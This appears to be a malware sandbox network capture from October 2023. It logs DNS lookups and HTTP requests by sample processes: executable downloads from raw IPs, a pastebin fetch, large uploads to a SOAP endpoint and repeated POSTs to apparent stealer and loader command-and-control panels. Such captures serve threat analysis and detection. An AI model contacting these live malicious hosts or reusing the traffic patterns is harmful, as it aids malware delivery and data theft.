GET /rinkas.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 5.42.65.80

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 11 Oct 2023 08:34:37 GMT
Content-Type: application/octet-stream
Content-Length: 15877632
Last-Modified: Tue, 10 Oct 2023 16:08:19 GMT
Connection: keep-alive
ETag: "652576f3-f24600"
Accept-Ranges: bytes
DNS

80.65.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

80.65.42.5.in-addr.arpa

IN PTR

Response
POST

http://77.91.124.1/theme/index.php

explothe.exe

Remote address:

77.91.124.1:80

Request

POST /theme/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.124.1
Content-Length: 89
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:34:40 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8
DNS

1.124.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.124.91.77.in-addr.arpa

IN PTR

Response

1.124.91.77.in-addr.arpa

IN PTR
POST

http://5.42.92.211/loghub/master

AppLaunch.exe

Remote address:

5.42.92.211:80

Request

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=6r5CSM0q4K2G9Cjcp1Hu
Content-Length: 209
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: 5.42.92.211
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 11 Oct 2023 08:34:42 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 8
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
DNS

211.92.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

211.92.42.5.in-addr.arpa

IN PTR

Response

211.92.42.5.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
DNS

196.168.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.168.217.172.in-addr.arpa

IN PTR

Response

196.168.217.172.in-addr.arpa

IN PTR

ams16s32-in-f41e100net
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://tyihwm.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 231
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 08:34:59 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gbdtxipjyt.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 198
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 08:34:59 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 45
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ensufql.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 166
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 08:35:00 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://fgammeewj.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 351
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 08:35:00 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://vgelqxomh.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 339
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 08:35:00 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://kpcfk.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 348
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 08:35:01 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://xbtlkt.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 205
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 08:35:01 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://caywsdjy.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 249
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 08:35:02 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://hhkhppvheh.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 167
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 08:35:02 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
GET

http://185.216.70.222/trafico.exe

Explorer.EXE

Remote address:

185.216.70.222:80

Request

GET /trafico.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 185.216.70.222

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:34:59 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Tue, 10 Oct 2023 13:49:38 GMT
ETag: "6b400-6075cfa598c47"
Accept-Ranges: bytes
Content-Length: 439296
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

222.70.216.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

222.70.216.185.in-addr.arpa

IN PTR

Response
DNS

222.70.216.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

222.70.216.185.in-addr.arpa

IN PTR

Response
DNS

22.236.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

22.236.111.52.in-addr.arpa

IN PTR

Response
POST

http://85.209.176.171/

DA47.exe

Remote address:

85.209.176.171:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
Host: 85.209.176.171
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Length: 212
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 11 Oct 2023 08:35:04 GMT
POST

http://85.209.176.171/

DA47.exe

Remote address:

85.209.176.171:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
Host: 85.209.176.171
Content-Length: 144
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 4744
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 11 Oct 2023 08:35:09 GMT
POST

http://85.209.176.171/

DA47.exe

Remote address:

85.209.176.171:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
Host: 85.209.176.171
Content-Length: 6842548
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 147
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 11 Oct 2023 08:35:33 GMT
POST

http://85.209.176.171/

DA47.exe

Remote address:

85.209.176.171:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
Host: 85.209.176.171
Content-Length: 6842540
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 261
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 11 Oct 2023 08:35:33 GMT
DNS

pastebin.com

D40C.exe

Remote address:

8.8.8.8:53

Request

pastebin.com

IN A

Response

pastebin.com

IN A

172.67.34.170

pastebin.com

IN A

104.20.67.143

pastebin.com

IN A

104.20.68.143
GET

https://pastebin.com/raw/8baCJyMF

D40C.exe

Remote address:

172.67.34.170:443

Request

GET /raw/8baCJyMF HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:35:05 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 616
Last-Modified: Wed, 11 Oct 2023 08:24:49 GMT
Server: cloudflare
CF-RAY: 8145c4884f5db932-AMS
DNS

tak.soydet.top

D40C.exe

Remote address:

8.8.8.8:53

Request

tak.soydet.top

IN A

Response

tak.soydet.top

IN A

95.217.246.182
DNS

171.176.209.85.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.176.209.85.in-addr.arpa

IN PTR

Response
DNS

170.34.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

170.34.67.172.in-addr.arpa

IN PTR

Response
DNS

182.246.217.95.in-addr.arpa

Remote address:

8.8.8.8:53

Request

182.246.217.95.in-addr.arpa

IN PTR

Response

182.246.217.95.in-addr.arpa

IN PTR

static18224621795clientsyour-serverde
DNS

api.ip.sb

DA47.exe

Remote address:

8.8.8.8:53

Request

api.ip.sb

IN A

Response

api.ip.sb

IN CNAME

api.ip.sb.cdn.cloudflare.net

api.ip.sb.cdn.cloudflare.net

IN A

104.26.13.31

api.ip.sb.cdn.cloudflare.net

IN A

104.26.12.31

api.ip.sb.cdn.cloudflare.net

IN A

172.67.75.172
DNS

api.ip.sb

DA47.exe

Remote address:

8.8.8.8:53

Request

api.ip.sb

IN A

Response

api.ip.sb

IN CNAME

api.ip.sb.cdn.cloudflare.net

api.ip.sb.cdn.cloudflare.net

IN A

104.26.12.31

api.ip.sb.cdn.cloudflare.net

IN A

104.26.13.31

api.ip.sb.cdn.cloudflare.net

IN A

172.67.75.172
GET

https://api.ip.sb/geoip

DA47.exe

Remote address:

104.26.13.31:443

Request

GET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:35:13 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 285
Connection: keep-alive
vary: Accept-Encoding
vary: Accept-Encoding
Cache-Control: no-cache
access-control-allow-origin: *
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZOMReJRzDa4WYNmB7wdnov%2B4QZZYvek%2FY88DLrq5kWZXrozwP7uT9TVY6bnz7nt6T53ZwepS%2Ffpo6M0G1LF2Xq56N7NnVOExwdA%2Bcwf3%2BSmPp0jIHOmAgVgPRQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 8145c4b98c5f1c93-AMS
alt-svc: h3=":443"; ma=86400
DNS

31.13.26.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

31.13.26.104.in-addr.arpa

IN PTR

Response
DNS

31.13.26.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

31.13.26.104.in-addr.arpa

IN PTR

Response
DNS

bytecloudasa.website

RegSvcs.exe

Remote address:

8.8.8.8:53

Request

bytecloudasa.website

IN A

Response

bytecloudasa.website

IN A

104.21.61.162

bytecloudasa.website

IN A

172.67.212.39
DNS

bytecloudasa.website

RegSvcs.exe

Remote address:

8.8.8.8:53

Request

bytecloudasa.website

IN A

Response

bytecloudasa.website

IN A

172.67.212.39

bytecloudasa.website

IN A

104.21.61.162
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 8
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:35:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Aqck79UbOerdO9KnZAuwRVIZOIdcdSmGFXbdv%2FzWmLva2P0HSrHc%2FdemdcLypbPdk0CknbYfWBlcSJ3q%2FODR4hyzc84usUPoZkbhZyas92JwTkqNGTHOJ51j4wpkuINQ%2BAW08rOzEA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c51c5d8806c0-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:35:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=jtsos2f6ju7quu646gio9ntchg; expires=Sun, 04 Feb 2024 02:22:08 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:35:29 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sDGBonYe5DfE%2Fq4IAACzzzB0Zme7z026u6ZAmzWNTv1jz7T2CT0FMwd8xv6vBZXHu9D1A8e4cY%2BAPdv55ODanjc2ZIrdLZNz0syuT%2BpYI%2B7ppO77tlGI9nYP3xl8aLCQWrmfolOtrQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c51e3f7206c0-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Host: bytecloudasa.website
Content-Length: 56
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:35:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=pt0qriv59in9h25b8k3cidunq5; expires=Sun, 04 Feb 2024 02:22:08 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:35:29 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kw%2Fyd2GdHrIDBQJNOu4e36jXgSy%2Bfb%2BTzxwEyFbxiPwN9TUAD7Zx2%2B%2F4i0xw3%2FzttN6XyDeyBdDcle7n0gVeGIWTKUtOM5AFEQ34U3oPCc4afYBxPwnIf8LbsC4k%2F7ei1m6PprG1pA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c51d4b400a70-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:35:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=6g4cq2037ii5reghb9agjgmt5j; expires=Sun, 04 Feb 2024 02:22:08 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:35:29 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3swsoAFwCEwKiukN79ShI26WoSh6Yu9GyQOwnDiGr%2BIDTxYQP1uPH%2BjPjGrj5SwyzXkFtTnYKzyCHHEqVv0e4dzMJPFfzjHnxb%2F2KEduCaWaJ2SsIaQS6h13N7FbFtx4gl70egbtDg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c51f5d6a6661-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:35:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=26fmlpl6cnm79knjklhko91js0; expires=Sun, 04 Feb 2024 02:22:09 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:35:30 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FonDz8TVWDK2Rw%2BVr%2FE3AzmzfwCuXGdDyVX8Br%2FNTCHO54uyLL299MXGQl9ZfsUY1GtRPHhFs8qq7ES7QrtJuK69b4DZpCP1lNgV1SpBlc%2Fhp0E5ukYhaYeEgOqba8W7hXehmrY%2BiA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c5205df16704-AMS
DNS

162.61.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

162.61.21.104.in-addr.arpa

IN PTR

Response
DNS

162.61.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

162.61.21.104.in-addr.arpa

IN PTR

Response
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:35:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=0865km10a8l41e86mttg2dqth3; expires=Sun, 04 Feb 2024 02:22:09 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:35:30 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SK%2Bs9jGKCJVwY7IAZM0%2B7QJW7lVAvv3Vo45IEartSBRYWfDtajLXHg5dyR%2F%2BfKhjGq6ze7%2FtvGrYmX6s%2BD62x%2B986BR%2FTsqVUd%2Bogseayp2vlpchuZ4h1P%2FHv2pG40z0AqAuG1CtCg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c5218de90ea4-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:35:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=corr242ai913j5a7efr5jpqmpr; expires=Sun, 04 Feb 2024 02:22:09 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:35:30 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=afvGhtiPQdQWL8waELFe63yzg5rrlJI1ck9Y5cdi4e9T8jXTaGSDkBFyRCGJuY%2F3dTgZsu65IUV%2BfoBueGMmIn7AHCih2oaOgNY8i6Hw0bn6k9dJgPNlXVFLtV8R%2BCAqcDH5uJ11Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c5226a9966eb-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:35:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=vqttuc3qogj5dq8ruhdb6gbmdo; expires=Sun, 04 Feb 2024 02:22:09 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:35:30 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
